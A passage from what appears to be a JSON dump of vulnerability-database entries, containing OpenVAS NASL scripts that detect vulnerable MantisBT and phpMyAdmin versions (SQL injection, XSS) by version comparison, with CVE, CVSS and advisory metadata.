See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mantisbt:mantisbt\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105902\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12818 $\");\n\n script_name(\"MantisBT Multiple SQL Injection Vulnerabilities\");\n\n script_bugtraq_id(65445, 65461);\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65445\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65461\");\n script_xref(name:\"URL\", value:\"http://www.mantisbt.org/bugs/view.php?id=16879\");\n script_xref(name:\"URL\", value:\"http://www.mantisbt.org/bugs/view.php?id=16880\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-18 10:55:03 +0100 (Tue, 18 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-25 11:38:14 +0700 (Tue, 25 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"mantis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"mantisbt/detected\");\n\n script_tag(name:\"summary\", value:\"There are multiple SQL Injection vulnerabilities in MantisBT which allow\n a remote attacker to access or modify data.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.2.16 or higher.\");\n\n 
script_tag(name:\"insight\", value:\"Use of db_query() instead of db_query_bound() allowed SQL injection\n attacks due to unsanitized use of parameters within the query when using\n the SOAP API mc_project_get_attachments, news_get_limited_rows, summary_print_by_enum,\n summary_print_by_age, summary_print_by_developer, summary_print_by_reporter, summary_print_by_category,\n create_bug_enum_summary, enum_bug_group function and mc_issue_attachment_get.\");\n\n script_tag(name:\"affected\", value:\"MantisBT Version 1.2.15 and prior.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can compromise the application, access or modify data,\n or exploit latent vulnerabilities in the underlying database.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version:vers, test_version:\"1.2.16\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"1.2.16\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-29T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-9534", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868141", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-9534\n#\n# Authors:\n# 
System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868141\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-29 05:51:42 +0200 (Fri, 29 Aug 2014)\");\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-9534\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9534\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137126.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the 
referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.7.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-24T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-9555", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868124", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-9555\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868124\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-24 06:05:37 +0200 (Sun, 24 Aug 2014)\");\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-9555\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9555\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136988.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n 
if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.7.1~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "Fedora Update for mantis FEDORA-2014-3421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2238", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867590", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mantis FEDORA-2014-3421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867590\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 12:20:38 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mantis FEDORA-2014-3421\");\n script_tag(name:\"affected\", value:\"mantis on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3421\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mantis'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mantis\", rpm:\"mantis~1.2.17~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:54", "description": "Check for the Version of mantis", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "Fedora Update for mantis FEDORA-2014-3421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2238", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867590", "href": "http://plugins.openvas.org/nasl.php?oid=867590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mantis FEDORA-2014-3421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867590);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 12:20:38 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mantis FEDORA-2014-3421\");\n\n tag_insight = \"Mantis is a free popular web-based issue tracking system.\nIt is written in the PHP scripting language and works with MySQL, MS SQL,\nand PostgreSQL databases and a web server.\nAlmost any web browser should be able to function as a client.\n\nDocumentation can be found in: /usr/share/doc/mantis\n\nWhen the package has finished installing, you will need to perform some\nadditional configuration steps these are described in:\n/usr/share/doc/mantis/README.Fedora\n\";\n\n tag_affected = \"mantis on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3421\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\");\n 
script_summary(\"Check for the Version of mantis\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mantis\", rpm:\"mantis~1.2.17~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201505-03", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201505-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8961", "CVE-2014-4986", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121377\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-03\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-6300\", \"CVE-2014-8958\", \"CVE-2014-8959\", \"CVE-2014-8960\", \"CVE-2014-8961\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.2.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.1.14.7\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.0.10.6\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2.13\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-10981", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868201", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-10981\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868201\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:45 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-6300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-10981\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10981\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.8.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-10989", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868203", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-10989\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868203\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:01 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-6300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-10989\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10989\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138640.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.8.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:27", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112019", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112019\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", 